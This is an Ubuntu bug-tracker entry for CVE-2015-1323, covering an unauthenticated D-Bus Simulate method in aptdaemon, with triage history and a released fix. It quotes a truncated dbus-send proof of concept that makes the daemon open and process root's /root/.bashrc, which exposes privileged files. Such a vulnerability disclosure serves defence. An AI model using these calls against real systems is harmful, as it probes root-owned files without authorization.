SImulate dbus method doesn't require authentication
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
aptdaemon (Ubuntu) |
Fix Released
|
Critical
|
Michael Vogt |
Bug Description
Reported via email from Tavis Ormandy:
-----
$ dbus-send --print-reply --system --dest=
/org/debian/apt org.debian.
boolean:false
method return sender=:1.13166 -> dest=:1.13182 reply_serial=2
string "/org/debian/
$ dbus-send --print-reply --system --dest=
/org/debian/
org.debian.
Error org.debian.
Lintian check results for /root/.bashrc:
warning: "/root/.bashrc" cannot be processed.
$ dbus-send --print-reply --system --dest=
/org/debian/apt org.debian.
boolean:false
method return sender=:1.13166 -> dest=:1.13184 reply_serial=2
string "/org/debian/
$ dbus-send --print-reply --system --dest=
/org/debian/
org.debian.
Error org.debian.
/root/.bashrca
----
(mdeslaur): Not only does this expose the existence of arbitrary files, but it actually access them and processes untrusted packages.
Changed in aptdaemon (Ubuntu): | |
status: | New → Triaged |
importance: | Undecided → Critical |
Changed in aptdaemon (Ubuntu): | |
assignee: | nobody → Michael Vogt (mvo) |
Changed in aptdaemon (Ubuntu): | |
status: | Triaged → In Progress |
information type: | Private Security → Public Security |
tags: | added: patch |
no longer affects: | software-center-aptdaemon-plugins (Ubuntu) |
This is CVE-2015-1323